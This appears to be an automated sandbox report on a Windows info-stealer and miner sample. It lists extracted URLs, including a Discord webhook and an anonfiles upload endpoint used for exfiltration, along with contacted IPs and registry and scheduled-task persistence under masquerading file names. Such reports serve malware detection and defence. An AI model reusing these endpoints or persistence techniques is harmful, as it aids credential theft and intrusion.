https://twitter.com/	based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1854346088.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8F2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868467332.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1819669283.00000273ED8F3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1784489237.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1793559715.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.olx.pl/	based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2	based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefox	based.exe, 00000008.00000003.1792926439.00000273ED855000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cacerts.digicert.coH	hacn.exe, 00000005.00000003.1726020286.000001BF73852000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	VaTlw2kNGc.exe, 00000001.00000003.1713356841.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713108881.000001A21EED7000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714275067.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713161017.000001A21EEF2000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1713836051.000001A21EEF4000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1709067914.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1714582569.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708290049.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708854333.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000002.1717458875.000001A21EEF8000.00000004.00000020.00020000.00000000.sdmp, VaTlw2kNGc.exe, 00000001.00000003.1708560343.000001A21EEFA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746827387.000001A050086000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744809631.000001A050084000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747074153.000001A050095000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000002.1748140847.000001A050099000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746475062.000001A0500BF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1746394971.000001A0500BA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744875342.000001A0500B8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1744645445.000001A050070000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000007.00000003.1747169873.000001A0500C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://MD8.mozilla.org/1/m	based.exe, 00000008.00000003.1908986723.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2381451502.00000273EDCB4000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1872277331.00000273ED8E8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://google.com/	based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/mail/	based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/urllib3/urllib3/issues/2920S	based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://google.com/mail/	based.exe, 00000008.00000002.2378287344.00000273ED06B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bugzilla.mo	based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	based.exe, 00000008.00000002.2379592577.00000273ED5B4000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.fr/	based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.git	based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png	based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/complete/	based.exe, 00000008.00000002.2381451502.00000273EDC38000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.openssl.org/H	based.exe, 00000006.00000003.1734194548.00000202B6EA0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2581670053.00007FFDFBAA6000.00000004.00000001.01000000.0000001D.sdmp, based.exe, 00000008.00000002.2529240083.00007FFDFB742000.00000004.00000001.01000000.0000001E.sdmp	false	URL Reputation: safe	unknown
https://api.anonfiles.com/uploadrU	based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1757107261.00000273ED37D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/mail	based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319649761.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1852165022.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379742963.00000273ED760000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1874644333.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379386136.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2371538109.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868913203.00000273ED47C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2319744738.00000273ED47B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2370626302.00000273ED476000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1787886162.00000273ED46D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	based.exe, 00000008.00000003.1856585098.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1865608051.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1809552854.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1823417228.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED896000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1868829846.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1841596618.00000273ED8D6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	based.exe, 00000008.00000003.2259677546.00000273EDA25000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);	based.exe, 00000008.00000002.2377486028.00000273EAF40000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2378472989.00000273ED090000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1752876018.00000273ED015000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2377891389.00000273EC858000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1749896560.00000273ED01B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1745966741.00000273ED02B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	based.exe, 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1753857795.00000273ED3A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	based.exe, 00000008.00000003.2260125136.00000273ED7F5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/	based.exe, 00000008.00000002.2381451502.00000273EDC84000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539	based.exe, 00000008.00000002.2379479019.00000273ED490000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	based.exe, 00000008.00000003.1909237453.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376496051.00000273ED40E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED3FA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2379225122.00000273ED412000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.de/	based.exe, 00000008.00000002.2381451502.00000273EDC6C000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com/line/?fields=hosting	based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
162.159.138.232	discord.com	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1486327
Start date and time:	2024-08-02 00:06:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	105
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	VaTlw2kNGc.exe renamed because original name is a hash value
Original Sample Name:	21dd41d299117fe5c556afc317f9fcbf.exe
Detection:	MAL
Classification:	mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@163/125@3/3
EGA Information:	Successful, ratio: 85.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 142.250.186.131
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target hacn.exe, PID 6584 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: VaTlw2kNGc.exe

Simulations

Behavior and APIs

Time	Type	Description
18:07:08	API Interceptor	1x Sleep call for process: setup.exe modified
18:07:12	API Interceptor	1x Sleep call for process: WMIC.exe modified
18:07:13	API Interceptor	149x Sleep call for process: powershell.exe modified
18:07:58	API Interceptor	341x Sleep call for process: based.exe modified
18:07:58	API Interceptor	1x Sleep call for process: conhost.exe modified
23:07:23	Task Scheduler	Run new task: dasHost path: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
23:07:23	Task Scheduler	Run new task: dasHostd path: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
23:07:25	Task Scheduler	Run new task: dwm path: "C:\Program Files\Mozilla Firefox\dwm.exe"
23:07:25	Task Scheduler	Run new task: dwmd path: "C:\Program Files\Mozilla Firefox\dwm.exe"
23:07:25	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
23:07:25	Task Scheduler	Run new task: powershell path: "C:\Recovery\powershell.exe"
23:07:26	Task Scheduler	Run new task: powershellp path: "C:\Recovery\powershell.exe"
23:07:26	Task Scheduler	Run new task: winlogon path: "C:\Recovery\winlogon.exe"
23:07:26	Task Scheduler	Run new task: winlogonw path: "C:\Recovery\winlogon.exe"
23:07:26	Task Scheduler	Run new task: wouVpTZDoyPyABKEH path: "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
23:07:26	Task Scheduler	Run new task: wouVpTZDoyPyABKEHw path: "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
23:07:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
23:07:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
23:07:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
23:07:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
23:08:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Mozilla Firefox\dwm.exe"
23:08:12	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
23:08:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
23:08:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
23:08:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
23:08:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Mozilla Firefox\dwm.exe"
23:09:00	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
23:09:09	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wouVpTZDoyPyABKEH "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
23:09:17	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
23:09:26	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run winlogon "C:\Recovery\winlogon.exe"
23:09:34	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files\Mozilla Firefox\dwm.exe"
23:09:50	Autostart	Run: WinLogon Shell "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
23:09:58	Autostart	Run: WinLogon Shell "C:\Users\Public\Documents\My Pictures\wouVpTZDoyPyABKEH.exe"
23:10:07	Autostart	Run: WinLogon Shell "C:\Recovery\powershell.exe"
23:10:15	Autostart	Run: WinLogon Shell "C:\Recovery\winlogon.exe"
23:10:23	Autostart	Run: WinLogon Shell "C:\Program Files\Mozilla Firefox\dwm.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	HnvcpgZOtM.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	7ICY2krDqo.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	jyz52R1C6Y.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	jigm8567e0.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	VfoanAPxNA.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	JzWHmWfXBX.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	qaaf5QSSPk.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	52i8S0bosh.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	DHL INVOICE_99765.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	TRE87656789000.bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	172250106616751cd7ad430f8c6bf21e469473814327035184ca6f9c9349f2dcc6c11cde07393.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SOA July Payment.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order PO11420.docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	REVISED UPDATE424 PO.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	e-dekont.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	new order.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Document.exe	Get hash	malicious	VIP Keylogger	Browse
	dI8tI8Lr5S.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse
162.159.138.232	Zoom_workspace.hta	Get hash	malicious	Cobalt Strike, Clipboard Hijacker	Browse
	qqgv6uKJOd.exe	Get hash	malicious	Clipboard Hijacker	Browse
	http://discord-proxy.tassadar2002.workers.dev/	Get hash	malicious	Unknown	Browse
	http://dapi.190823.xyz/	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002A_147.exe	Get hash	malicious	Blank Grabber	Browse
	LisectAVT_2403002A_368.exe	Get hash	malicious	Blank Grabber, DCRat, Umbral Stealer	Browse
	Setup 3.0.0.msi	Get hash	malicious	Unknown	Browse
	DD Spotify Acc Gen.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse
	LisectAVT_2403002A_260.exe	Get hash	malicious	Python Stealer, Blank Grabber, Rose Stealer, Xmrig	Browse
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	8Ck8T5qRcC.exe	Get hash	malicious	Blank Grabber, DCRat, PureLog Stealer, Xmrig, zgRAT	Browse	162.159.136.232
	Zoom_workspace.hta	Get hash	malicious	Cobalt Strike, Clipboard Hijacker	Browse	162.159.138.232
	SecuriteInfo.com.Python.Muldrop.16.5435.25481.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	EJH8vdN1sP.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	TamenuV11.msi	Get hash	malicious	Unknown	Browse	162.159.135.232
	http://discord-proxy.tassadar2002.workers.dev/	Get hash	malicious	Unknown	Browse	162.159.138.232
	http://dapi.190823.xyz/	Get hash	malicious	Unknown	Browse	162.159.138.232
	http://via.evove.top	Get hash	malicious	Unknown	Browse	162.159.136.232
	LisectAVT_2403002A_147.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	LisectAVT_2403002A_210.exe	Get hash	malicious	Python Stealer, Empyrean, Discord Token Stealer	Browse	162.159.128.233
ip-api.com	HnvcpgZOtM.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	7ICY2krDqo.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	jyz52R1C6Y.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	jigm8567e0.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	VfoanAPxNA.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	JzWHmWfXBX.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	qaaf5QSSPk.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	52i8S0bosh.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DHL INVOICE_99765.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
api.telegram.org	TRE87656789000.bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	172250106616751cd7ad430f8c6bf21e469473814327035184ca6f9c9349f2dcc6c11cde07393.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	83MZfLKh7D.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine	Browse	149.154.167.220
	SOA July Payment.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Purchase Order PO11420.docx.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REVISED UPDATE424 PO.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	e-dekont.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
